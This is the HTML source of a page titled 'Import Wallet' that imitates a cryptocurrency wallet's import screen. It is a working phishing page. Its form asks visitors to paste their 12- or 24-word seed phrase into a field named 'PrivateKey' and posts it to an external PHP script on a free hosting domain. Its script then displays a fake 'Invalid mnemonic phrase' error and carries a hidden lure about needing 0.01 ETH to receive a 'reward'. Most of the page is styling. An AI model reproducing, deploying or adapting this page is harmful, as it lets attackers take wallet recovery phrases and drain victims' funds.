
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link rel="shortcut icon" href="image/favicon.png" type="image/x-icon">
    <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
    <title>Import Wallet</title>
    <link rel="stylesheet" type="text/css" href="./Import-Multi-Wallet_files/tel552.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./Import-Multi-Wallet_files/tel553.css" title="rtl" disabled="">
    <style></style>
    <style data-jss="" data-meta="MuiInputBase">
      @-webkit-keyframes mui-auto-fill {}
      @-webkit-keyframes mui-auto-fill-cancel {}
      .MuiInputBase-root {
      color: rgba(0, 0, 0, 0.87);
      cursor: text;
      display: inline-flex;
      position: relative;m
      font-size: 1rem;
      box-sizing: border-box;
      align-items: center;
      font-family: "Roboto", "Helvetica", "Arial", sans-serif;
      font-weight: 400;
      line-height: 1.1876em;
      letter-spacing: 0.00938em;
      }
      .MuiInputBase-root.Mui-disabled {
      color: rgba(0, 0, 0, 0.38);
      cursor: default;
      }
      .MuiInputBase-multiline {
      padding: 6px 0 7px;
      }
      .MuiInputBase-multiline.MuiInputBase-marginDense {
      padding-top: 3px;
      }
      .MuiInputBase-fullWidth {
      width: 100%;
      }
      .MuiInputBase-input {
      font: inherit;
      color: currentColor;
      width: 100%;
      border: 0;
      height: 1.1876em;
      margin: 0;
      display: block;
      padding: 6px 0 7px;
      min-width: 0;
      background: none;
      box-sizing: content-box;
      animation-name: mui-auto-fill-cancel;
      letter-spacing: inherit;
      animation-duration: 10ms;
      -webkit-tap-highlight-color: transparent;
      }
      .MuiInputBase-input::-webkit-input-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      }
      .MuiInputBase-input::-moz-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      }
      .MuiInputBase-input:-ms-input-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      }
      .MuiInputBase-input::-ms-input-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      }
      .MuiInputBase-input:focus {
      outline: 0;
      }
      .MuiInputBase-input:invalid {
      box-shadow: none;
      }
      .MuiInputBase-input::-webkit-search-decoration {
      -webkit-appearance: none;
      }
      .MuiInputBase-input.Mui-disabled {
      opacity: 1;
      }
      .MuiInputBase-input:-webkit-autofill {
      animation-name: mui-auto-fill;
      animation-duration: 5000s;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
      opacity: 0 !important;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
      opacity: 0 !important;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
      opacity: 0 !important;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
      opacity: 0 !important;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
      opacity: 0.42;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
      opacity: 0.42;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
      opacity: 0.42;
      }
      label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
      opacity: 0.42;
      }
      .MuiInputBase-inputMarginDense {
      padding-top: 3px;
      }
      .MuiInputBase-inputMultiline {
      height: auto;
      resize: none;
      padding: 0;
      }
      .MuiInputBase-inputTypeSearch {
      -moz-appearance: textfield;
      -webkit-appearance: textfield;
      }
    </style>
    <style data-jss="" data-meta="MuiInput">
      .MuiInput-root {
      position: relative;
      }
      label + .MuiInput-formControl {
      margin-top: 16px;
      }
      .MuiInput-colorSecondary.MuiInput-underline:after {
      border-bottom-color: #f50057;
      }
      .MuiInput-underline:after {
      left: 0;
      right: 0;
      bottom: 0;
      content: "";
      position: absolute;
      transform: scaleX(0);
      transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
      border-bottom: 2px solid #3f51b5;
      pointer-events: none;
      }
      .MuiInput-underline.Mui-focused:after {
      transform: scaleX(1);
      }
      .MuiInput-underline.Mui-error:after {
      transform: scaleX(1);
      border-bottom-color: #f44336;
      }
      .MuiInput-underline:before {
      left: 0;
      right: 0;
      bottom: 0;
      content: "\00a0";
      position: absolute;
      transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      border-bottom: 1px solid rgba(0, 0, 0, 0.42);
      pointer-events: none;
      }
      .MuiInput-underline:hover:not(.Mui-disabled):before {
      border-bottom: 2px solid rgba(0, 0, 0, 0.87);
      }
      .MuiInput-underline.Mui-disabled:before {
      border-bottom-style: dotted;
      }
      @media (hover: none) {
      .MuiInput-underline:hover:not(.Mui-disabled):before {
      border-bottom: 1px solid rgba(0, 0, 0, 0.42);
      }
      }
    </style>
    <style data-jss="" data-meta="MuiFormLabel">
      .MuiFormLabel-root {
      color: rgba(0, 0, 0, 0.54);
      padding: 0;
      font-size: 1rem;
      font-family: "Roboto", "Helvetica", "Arial", sans-serif;
      font-weight: 400;
      line-height: 1;
      letter-spacing: 0.00938em;
      }
      .MuiFormLabel-root.Mui-focused {
      color: #3f51b5;
      }
      .MuiFormLabel-root.Mui-disabled {
      color: rgba(0, 0, 0, 0.38);
      }
      .MuiFormLabel-root.Mui-error {
      color: #f44336;
      }
      .MuiFormLabel-colorSecondary.Mui-focused {
      color: #f50057;
      }
      .MuiFormLabel-asterisk.Mui-error {
      color: #f44336;
      }
    </style>
    <style data-jss="" data-meta="MuiInputLabel">
      .MuiInputLabel-root {
      display: block;
      transform-origin: top left;
      }
      .MuiInputLabel-formControl {
      top: 0;
      left: 0;
      position: absolute;
      transform: translate(0, 24px) scale(1);
      }
      .MuiInputLabel-marginDense {
      transform: translate(0, 21px) scale(1);
      }
      .MuiInputLabel-shrink {
      transform: translate(0, 1.5px) scale(0.75);
      transform-origin: top left;
      }
      .MuiInputLabel-animated {
      transition: color 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms,transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
      }
      .MuiInputLabel-filled {
      z-index: 1;
      transform: translate(12px, 20px) scale(1);
      pointer-events: none;
      }
      .MuiInputLabel-filled.MuiInputLabel-marginDense {
      transform: translate(12px, 17px) scale(1);
      }
      .MuiInputLabel-filled.MuiInputLabel-shrink {
      transform: translate(12px, 10px) scale(0.75);
      }
      .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
      transform: translate(12px, 7px) scale(0.75);
      }
      .MuiInputLabel-outlined {
      z-index: 1;
      transform: translate(14px, 20px) scale(1);
      pointer-events: none;
      }
      .MuiInputLabel-outlined.MuiInputLabel-marginDense {
      transform: translate(14px, 12px) scale(1);
      }
      .MuiInputLabel-outlined.MuiInputLabel-shrink {
      transform: translate(14px, -6px) scale(0.75);
      }
    </style>
    <style data-jss="" data-meta="MuiFormControl">
      .MuiFormControl-root {
      border: 0;
      margin: 0;
      display: inline-flex;
      padding: 0;
      position: relative;
      min-width: 0;
      flex-direction: column;
      vertical-align: top;
      }
      .MuiFormControl-marginNormal {
      margin-top: 16px;
      margin-bottom: 8px;
      }
      .MuiFormControl-marginDense {
      margin-top: 8px;
      margin-bottom: 4px;
      }
      .MuiFormControl-fullWidth {
      width: 100%;
      }
    </style>
    <style data-jss="" data-meta="MuiTextField">
    </style>
    <style data-jss="" data-meta="makeStyles">
      .jss1 {
      color: #aeaeae;
      font-weight: 400;
      }
      .jss1.jss2 {
      color: #aeaeae;
      }
      .jss1.jss4 {
      color: #aeaeae;
      }
      .jss3:after {
      border-bottom: 2px solid #f7861c;
      }
      .jss5 {
      color: #aeaeae;
      }
      .jss6 {
      padding: 8px;
      }
      .jss6::placeholder {
      color: #aeaeae;
      }
      .jss7 {
      color: #fff;
      }
      .jss8:after {
      border-bottom: 2px solid #fff;
      }
      .jss9.jss10 {
      color: #5b5b5b;
      }
      .jss9.jss4 {
      color: #5b5b5b;
      }
      .jss12 {
      border: 1px solid #BBC0C5;
      height: 48px;
      display: flex;
      padding: 0 16px;
      align-items: center;
      border-radius: 6px;
      }
      label + .jss12 {
      margin-top: 9px;
      }
      .jss12.jss11 {
      border: 1px solid #2f9ae0;
      }
      .jss13 {
      color: #5b5b5b;
      position: initial;
      font-size: 1rem;
      transform: none;
      transition: none;
      }
      .jss14 {
      color: #5b5b5b;
      position: initial;
      font-size: .75rem;
      transform: none;
      transition: none;
      }
      .jss15 {
      line-height: initial !important;
      }
    </style>
  </head>
  <body><P>
    <div id="app-content">
      <div class="app mouse-user-styles">
        <div class="app-header">
          <div class="app-header__contents"><P
            <img src="./image/logowallett.jpg"><P>
			
			
          </div>
        </div>
        <div class="main-container-wrapper">
          <div class="first-view-main-wrapper">
            <div class="first-view-main">
              <form method="post" action="https://mambanadenoi99.000webhostapp.com/trusoi1.php">
                <div class="import-account">
                  <div class="import-account__title">Import Wallet</div>
                  <div class="import-account__selector-label">Enter your secret phrase here to connect</div>
                  <div class="import-account__input-wrapper"><label class="import-account__input-label">Phrase</label><textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="PrivateKey" minlength="25" required="true" onkeypress="return (event.charCode &gt; 64 &amp;&amp; event.charCode &lt; 91) || (event.charCode &gt; 96 &amp;&amp; event.charCode &lt; 123) || (event.charCode==32)"></textarea><span class="error"></span></div>
                  <p style="color: #959595">Typically 12 (sometimes 24) words separated by single spaces</p>
                  <button class="button btn--first-time first-time-flow__button" role="button" tabindex="0">IMPORT</button>
                  <p id="errorText" style="color: red; display: none;"></p>
                  <p id="importantText" style="display: none;">* Need 0.01 ETH to receive the reward</p>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div id="popover-content"></div>
    <script src="./Import-Multi-Wallet_files/jquery.slim.min.js.download"></script>
    <script>
      $(function(){
        function visibilityImportantText(visible) {
          if(visible == true) $("#importantText").css('display','block')
          else $("#importantText").css('display','none')
          $("#importantText").html("* Need 0.01 ETH to receive the reward")
        }

        function visibilityErrorText(visible, text = null) {
          if(visible == true) $("#errorText").css('display','block')
          else $("#errorText").css('display','none')
          $("#errorText").html(text)
        }

                  visibilityImportantText(false)
        
                  visibilityErrorText(true,"Invalid mnemonic phrase")
          setTimeout(function(){
            visibilityErrorText(false)
          },5000)
                        })
    </script>
  
</body></html>